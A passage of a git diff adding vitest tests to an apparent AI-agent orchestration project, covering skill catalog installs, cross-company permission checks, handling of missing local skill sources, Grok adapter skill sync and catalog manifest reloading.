catalogSkillId: "paperclipai:bundled:software-development:review",
slug: "review",
});
expect(res.status, JSON.stringify(res.body)).toBe(201);
expect(mockCompanySkillService.installFromCatalog).toHaveBeenCalledWith("company-1", {
catalogSkillId: "paperclipai:bundled:software-development:review",
slug: "review",
});
expect(mockLogActivity).toHaveBeenCalledWith(expect.anything(), expect.objectContaining({
companyId: "company-1",
action: "company.skill_catalog_installed",
entityType: "company_skill",
entityId: "skill-1",
details: expect.objectContaining({
catalogId: "paperclipai:bundled:software-development:review",
catalogKey: "paperclipai/bundled/software-development/review",
originHash: "sha256:abc",
}),
}));
});
it("tracks public GitHub skill imports with an explicit skill reference", async () => {
mockCompanySkillService.importFromSource.mockResolvedValue({
imported: [
@ -274,6 +464,26 @@ describe("company skill mutation permissions", () => {
expect(mockCompanySkillService.importFromSource).not.toHaveBeenCalled();
});
it("blocks agent catalog installs for other companies", async () => {
mockAgentService.getById.mockResolvedValue({
id: "agent-1",
companyId: "company-1",
permissions: { canCreateAgents: true },
});
const res = await request(await createApp({
type: "agent",
agentId: "agent-1",
companyId: "company-1",
runId: "run-1",
}))
.post("/api/companies/company-2/skills/install-catalog")
.send({ catalogSkillId: "paperclipai:bundled:software-development:review" });
expect(res.status, JSON.stringify(res.body)).toBe(403);
expect(mockCompanySkillService.installFromCatalog).not.toHaveBeenCalled();
});
it("allows agents with canCreateAgents to mutate company skills", async () => {
mockAgentService.getById.mockResolvedValue({
id: "agent-1",

300
server/src/__tests__/company-skills-service.test.ts
View file

@ -3,7 +3,7 @@ import os from "node:os";
import path from "node:path";
import { promises as fs } from "node:fs";
import { afterAll, afterEach, beforeAll, describe, expect, it } from "vitest";
import { companies, companySkills, createDb } from "@paperclipai/db";
import { agents, companies, companySkills, createDb } from "@paperclipai/db";
import {
getEmbeddedPostgresTestSupport,
startEmbeddedPostgresTestDatabase,
@ -23,15 +23,21 @@ describeEmbeddedPostgres("companySkillService.list", () => {
let db!: ReturnType<typeof createDb>;
let svc!: ReturnType<typeof companySkillService>;
let tempDb: Awaited<ReturnType<typeof startEmbeddedPostgresTestDatabase>> | null = null;
let oldPaperclipHome: string | undefined;
let paperclipHome: string | null = null;
const cleanupDirs = new Set<string>();
beforeAll(async () => {
tempDb = await startEmbeddedPostgresTestDatabase("paperclip-company-skills-service-");
oldPaperclipHome = process.env.PAPERCLIP_HOME;
paperclipHome = await fs.mkdtemp(path.join(os.tmpdir(), "paperclip-company-skills-home-"));
process.env.PAPERCLIP_HOME = paperclipHome;
db = createDb(tempDb.connectionString);
svc = companySkillService(db);
}, 20_000);
afterEach(async () => {
await db.delete(agents);
await db.delete(companySkills);
await db.delete(companies);
await Promise.all(Array.from(cleanupDirs, (dir) => fs.rm(dir, { recursive: true, force: true })));
@ -39,6 +45,11 @@ describeEmbeddedPostgres("companySkillService.list", () => {
});
afterAll(async () => {
if (oldPaperclipHome === undefined) delete process.env.PAPERCLIP_HOME;
else process.env.PAPERCLIP_HOME = oldPaperclipHome;
if (paperclipHome) {
await fs.rm(paperclipHome, { recursive: true, force: true });
}
await tempDb?.cleanup();
});
@ -96,4 +107,291 @@ describeEmbeddedPostgres("companySkillService.list", () => {
message: "Company not found",
});
});
it("does not persist audit failures for remote-source skills", async () => {
const companyId = randomUUID();
const skillId = randomUUID();
await db.insert(companies).values({
id: companyId,
name: "Paperclip",
issuePrefix: `T${companyId.replace(/-/g, "").slice(0, 6).toUpperCase()}`,
requireBoardApprovalForNewAgents: false,
});
await db.insert(companySkills).values({
id: skillId,
companyId,
key: "github.com/acme/remote-skill",
slug: "remote-skill",
name: "Remote Skill",
description: null,
markdown: "# Remote Skill\n",
sourceType: "github",
sourceLocator: "https://github.com/acme/remote-skill",
sourceRef: "main",
trustLevel: "markdown_only",
compatibility: "compatible",
fileInventory: [{ path: "SKILL.md", kind: "skill" }],
metadata: { sourceKind: "github", owner: "acme", repo: "remote-skill" },
});
await expect(svc.auditSkill(companyId, skillId)).rejects.toMatchObject({
status: 422,
message: "Only local-path and catalog-managed company skills support audit.",
});
await expect(svc.getById(companyId, skillId)).resolves.toMatchObject({
metadata: { sourceKind: "github", owner: "acme", repo: "remote-skill" },
});
});
it("preserves missing local-path skills that active agents still desire", async () => {
const companyId = randomUUID();
const skillId = randomUUID();
const skillKey = `company/${companyId}/reflection-coach`;
const missingSkillDir = path.join(await fs.mkdtemp(path.join(os.tmpdir(), "paperclip-missing-used-skill-")), "gone");
cleanupDirs.add(path.dirname(missingSkillDir));
await db.insert(companies).values({
id: companyId,
name: "Paperclip",
issuePrefix: `T${companyId.replace(/-/g, "").slice(0, 6).toUpperCase()}`,
requireBoardApprovalForNewAgents: false,
});
await db.insert(companySkills).values({
id: skillId,
companyId,
key: skillKey,
slug: "reflection-coach",
name: "Reflection Coach",
description: null,
markdown: "# Reflection Coach\n",
sourceType: "local_path",
sourceLocator: missingSkillDir,
trustLevel: "markdown_only",
compatibility: "compatible",
fileInventory: [{ path: "SKILL.md", kind: "skill" }],
metadata: { sourceKind: "local_path" },
});
await db.insert(agents).values({
id: randomUUID(),
companyId,
name: "Reviewer",
role: "engineer",
status: "active",
adapterType: "codex_local",
adapterConfig: {
paperclipSkillSync: {
desiredSkills: [skillKey],
},
},
});
const listed = await svc.list(companyId);
const listedSkill = listed.find((skill) => skill.id === skillId);
const detail = await svc.detail(companyId, skillId);
const stored = await svc.getById(companyId, skillId);
const marker = stored?.metadata?.missingSource;
expect(listedSkill).toMatchObject({
id: skillId,
attachedAgentCount: 1,
});
expect(detail?.usedByAgents).toEqual([
expect.objectContaining({
name: "Reviewer",
desired: true,
}),
]);
expect(marker).toMatchObject({
reason: "local_source_missing",
sourceType: "local_path",
sourceLocator: missingSkillDir,
sourcePath: missingSkillDir,
});
expect(Number.isNaN(Date.parse(String((marker as Record<string, unknown>).detectedAt)))).toBe(false);
});
it("continues pruning missing local-path skills that no active agent desires", async () => {
const companyId = randomUUID();
const skillId = randomUUID();
const missingSkillDir = path.join(await fs.mkdtemp(path.join(os.tmpdir(), "paperclip-missing-unused-skill-")), "gone");
cleanupDirs.add(path.dirname(missingSkillDir));
await db.insert(companies).values({
id: companyId,
name: "Paperclip",
issuePrefix: `T${companyId.replace(/-/g, "").slice(0, 6).toUpperCase()}`,
requireBoardApprovalForNewAgents: false,
});
await db.insert(companySkills).values({
id: skillId,
companyId,
key: `company/${companyId}/unused-skill`,
slug: "unused-skill",
name: "Unused Skill",
description: null,
markdown: "# Unused Skill\n",
sourceType: "local_path",
sourceLocator: missingSkillDir,
trustLevel: "markdown_only",
compatibility: "compatible",
fileInventory: [{ path: "SKILL.md", kind: "skill" }],
metadata: { sourceKind: "local_path" },
});
const listed = await svc.list(companyId);
expect(listed.find((skill) => skill.id === skillId)).toBeUndefined();
await expect(svc.getById(companyId, skillId)).resolves.toBeNull();
});
it("clears the missing-source marker when a local-path skill source returns", async () => {
const companyId = randomUUID();
const skillId = randomUUID();
const skillDir = await fs.mkdtemp(path.join(os.tmpdir(), "paperclip-restored-skill-"));
cleanupDirs.add(skillDir);
await fs.writeFile(path.join(skillDir, "SKILL.md"), "# Restored Skill\n", "utf8");
await db.insert(companies).values({
id: companyId,
name: "Paperclip",
issuePrefix: `T${companyId.replace(/-/g, "").slice(0, 6).toUpperCase()}`,
requireBoardApprovalForNewAgents: false,
});
await db.insert(companySkills).values({
id: skillId,
companyId,
key: `company/${companyId}/restored-skill`,
slug: "restored-skill",
name: "Restored Skill",
description: null,
markdown: "# Restored Skill\n",
sourceType: "local_path",
sourceLocator: skillDir,
trustLevel: "markdown_only",
compatibility: "compatible",
fileInventory: [{ path: "SKILL.md", kind: "skill" }],
metadata: {
sourceKind: "local_path",
missingSource: {
reason: "local_source_missing",
sourceType: "local_path",
sourceLocator: skillDir,
sourcePath: skillDir,
detectedAt: "2026-05-28T00:00:00.000Z",
},
},
});
await svc.list(companyId);
const stored = await svc.getById(companyId, skillId);
expect(stored?.metadata).toEqual({ sourceKind: "local_path" });
});
it("marks source-missing company skills as unavailable during read-only runtime listing", async () => {
const companyId = randomUUID();
const skillId = randomUUID();
const skillKey = `company/${companyId}/reflection-coach`;
const missingSkillDir = path.join(await fs.mkdtemp(path.join(os.tmpdir(), "paperclip-readonly-missing-skill-")), "gone");
cleanupDirs.add(path.dirname(missingSkillDir));
await db.insert(companies).values({
id: companyId,
name: "Paperclip",
issuePrefix: `T${companyId.replace(/-/g, "").slice(0, 6).toUpperCase()}`,
requireBoardApprovalForNewAgents: false,
});
await db.insert(companySkills).values({
id: skillId,
companyId,
key: skillKey,
slug: "reflection-coach",
name: "Reflection Coach",
description: null,
markdown: "# Reflection Coach\n",
sourceType: "local_path",
sourceLocator: missingSkillDir,
trustLevel: "markdown_only",
compatibility: "compatible",
fileInventory: [{ path: "SKILL.md", kind: "skill" }],
metadata: { sourceKind: "local_path" },
});
await db.insert(agents).values({
id: randomUUID(),
companyId,
name: "Reviewer",
role: "engineer",
status: "active",
adapterType: "codex_local",
adapterConfig: {
paperclipSkillSync: {
desiredSkills: [skillKey],
},
},
});
const entries = await svc.listRuntimeSkillEntries(companyId, { materializeMissing: false });
const entry = entries.find((candidate) => candidate.key === skillKey);
expect(entry).toMatchObject({
key: skillKey,
sourceStatus: "missing",
missingDetail: expect.stringContaining(missingSkillDir),
});
await expect(fs.stat(entry!.source)).rejects.toMatchObject({ code: "ENOENT" });
});
it("materializes source-missing company skills from the stored markdown during runtime listing", async () => {
const companyId = randomUUID();
const skillId = randomUUID();
const skillKey = `company/${companyId}/runtime-coach`;
const missingSkillDir = path.join(await fs.mkdtemp(path.join(os.tmpdir(), "paperclip-runtime-missing-skill-")), "gone");
cleanupDirs.add(path.dirname(missingSkillDir));
await db.insert(companies).values({
id: companyId,
name: "Paperclip",
issuePrefix: `T${companyId.replace(/-/g, "").slice(0, 6).toUpperCase()}`,
requireBoardApprovalForNewAgents: false,
});
await db.insert(companySkills).values({
id: skillId,
companyId,
key: skillKey,
slug: "runtime-coach",
name: "Runtime Coach",
description: null,
markdown: "# Runtime Coach\n\nRecovered from DB.\n",
sourceType: "local_path",
sourceLocator: missingSkillDir,
trustLevel: "markdown_only",
compatibility: "compatible",
fileInventory: [{ path: "SKILL.md", kind: "skill" }],
metadata: { sourceKind: "local_path" },
});
await db.insert(agents).values({
id: randomUUID(),
companyId,
name: "Runner",
role: "engineer",
status: "active",
adapterType: "codex_local",
adapterConfig: {
paperclipSkillSync: {
desiredSkills: [skillKey],
},
},
});
const entries = await svc.listRuntimeSkillEntries(companyId);
const entry = entries.find((candidate) => candidate.key === skillKey);
expect(entry).toMatchObject({
key: skillKey,
sourceStatus: "available",
});
await expect(fs.readFile(path.join(entry!.source, "SKILL.md"), "utf8")).resolves.toBe(
"# Runtime Coach\n\nRecovered from DB.\n",
);
});
});

59
server/src/__tests__/grok-local-skill-sync.test.ts Normal file
View file

@ -0,0 +1,59 @@
import { describe, expect, it } from "vitest";
import {
listGrokSkills,
syncGrokSkills,
} from "@paperclipai/adapter-grok-local/server";
describe("grok local skill sync", () => {
const paperclipKey = "paperclipai/paperclip/paperclip";
const createAgentKey = "paperclipai/paperclip/paperclip-create-agent";
it("reports Grok skills as ephemeral workspace-mounted state", async () => {
const snapshot = await listGrokSkills({
agentId: "agent-1",
companyId: "company-1",
adapterType: "grok_local",
config: {
paperclipSkillSync: {
desiredSkills: [paperclipKey],
},
},
});
expect(snapshot.adapterType).toBe("grok_local");
expect(snapshot.supported).toBe(true);
expect(snapshot.mode).toBe("ephemeral");
expect(snapshot.desiredSkills).toContain(paperclipKey);
expect(snapshot.desiredSkills).toContain(createAgentKey);
expect(snapshot.entries.find((entry) => entry.key === paperclipKey)).toMatchObject({
required: true,
state: "configured",
detail: "Will be copied into `.claude/skills` in the execution workspace on the next run.",
});
});
it("tracks unavailable desired Grok skills as missing without persistent install state", async () => {
const snapshot = await syncGrokSkills({
agentId: "agent-2",
companyId: "company-1",
adapterType: "grok_local",
config: {
paperclipRuntimeSkills: [],
paperclipSkillSync: {
desiredSkills: ["unknown-skill"],
},
},
}, ["unknown-skill"]);
expect(snapshot.mode).toBe("ephemeral");
expect(snapshot.warnings).toContain(
'Desired skill "unknown-skill" is not available from the Paperclip skills directory.',
);
expect(snapshot.entries).toContainEqual(expect.objectContaining({
key: "unknown-skill",
state: "missing",
origin: "external_unknown",
targetPath: null,
}));
});
});

113
server/src/__tests__/skills-catalog-service.test.ts Normal file
View file

@ -0,0 +1,113 @@
import { beforeEach, describe, expect, it, vi } from "vitest";
import type { CatalogSkill } from "@paperclipai/shared";
const mockExistsSync = vi.hoisted(() => vi.fn());
const mockReadFileSync = vi.hoisted(() => vi.fn());
const mockStatSync = vi.hoisted(() => vi.fn());
const mockReadFile = vi.hoisted(() => vi.fn());
vi.doMock("node:fs", async () => {
const actual = await vi.importActual<typeof import("node:fs")>("node:fs");
return {
...actual,
existsSync: mockExistsSync,
readFileSync: mockReadFileSync,
statSync: mockStatSync,
promises: {
...actual.promises,
readFile: mockReadFile,
},
};
});
function catalogSkill(slug: string, name = slug): CatalogSkill {
return {
id: `paperclipai:bundled:software-development:${slug}`,
key: `paperclipai/bundled/software-development/${slug}`,
kind: "bundled",
category: "software-development",
slug,
name,
description: `${name} catalog skill used by the reload test.`,
path: `catalog/bundled/software-development/${slug}`,
entrypoint: "SKILL.md",
trustLevel: "markdown_only",
compatibility: "compatible",
defaultInstall: false,
recommendedForRoles: ["engineer"],
requires: [],
tags: ["test"],
files: [{ path: "SKILL.md", kind: "skill", sizeBytes: 8, sha256: `sha256:${slug}` }],
contentHash: `sha256:${slug}`,
};
}
function manifest(skills: CatalogSkill[], packageVersion = "0.3.1") {
return JSON.stringify({
schemaVersion: 1,
packageName: "@paperclipai/skills-catalog",
packageVersion,
generatedAt: "2026-05-28T00:00:00.000Z",
skills,
});
}
describe("skills catalog service", () => {
let manifestJson: string;
let manifestMtimeMs: number;
beforeEach(() => {
vi.resetModules();
vi.clearAllMocks();
manifestJson = manifest([catalogSkill("old-skill", "Old Skill")]);
manifestMtimeMs = 1;
mockExistsSync.mockReturnValue(true);
mockReadFileSync.mockImplementation(() => manifestJson);
mockStatSync.mockImplementation(() => ({
mtimeMs: manifestMtimeMs,
size: Buffer.byteLength(manifestJson),
}));
mockReadFile.mockImplementation(async (filePath: string) => `content:${filePath}`);
});
it("caches and reloads the generated catalog manifest when it changes", async () => {
const service = await import("../services/skills-catalog.js");
expect(service.listCatalogSkills().map((skill) => skill.key)).toEqual([
"paperclipai/bundled/software-development/old-skill",
]);
expect(service.listCatalogSkills().map((skill) => skill.key)).toEqual([
"paperclipai/bundled/software-development/old-skill",
]);
expect(mockReadFileSync).toHaveBeenCalledTimes(1);
manifestJson = manifest([catalogSkill("new-skill", "New Skill")], "0.3.2");
manifestMtimeMs += 1;
expect(service.listCatalogSkills().map((skill) => skill.key)).toEqual([
"paperclipai/bundled/software-development/new-skill",
]);
expect(mockReadFileSync).toHaveBeenCalledTimes(2);
expect(() => service.getCatalogSkillOrThrow("old-skill")).toThrow("Catalog skill not found");
expect(service.getCatalogPackageMetadata()).toEqual({
packageName: "@paperclipai/skills-catalog",
packageVersion: "0.3.2",
});
});
it("rejects catalog asset previews without decoding bytes as utf8", async () => {
const imageSkill = catalogSkill("with-image", "With Image");
imageSkill.files = [
...imageSkill.files,
{ path: "assets/logo.png", kind: "asset", sizeBytes: 4, sha256: "sha256:logo" },
];
manifestJson = manifest([imageSkill]);
const service = await import("../services/skills-catalog.js");
await expect(service.readCatalogSkillFile(imageSkill.id, "assets/logo.png")).rejects.toMatchObject({
status: 415,
message: "Catalog asset previews are not supported.",
});
expect(mockReadFile).not.toHaveBeenCalled();
});
});

4
server/src/__tests__/workspace-runtime.test.ts
View file

@ -1947,7 +1947,7 @@ describe("realizeExecutionWorkspace", () => {
config: {
workspaceStrategy: {
type: "git_worktree",
// No baseRef configured — origin/HEAD should win over fallback branches.
// No baseRef configured — origin/master is preferred over the symbolic-ref.
},
},
issue: {
@ -1967,7 +1967,7 @@ describe("realizeExecutionWorkspace", () => {
expect(workspace.created).toBe(true);
const worktreeOp = operations.find(op => op.phase === "worktree_prepare" && op.metadata?.created);
expect(worktreeOp).toBeDefined();
expect(worktreeOp!.metadata!.baseRef).toBe("origin/main");
expect(worktreeOp!.metadata!.baseRef).toBe("origin/master");
}, 10_000);
it("removes a created git worktree and branch during cleanup", async () => {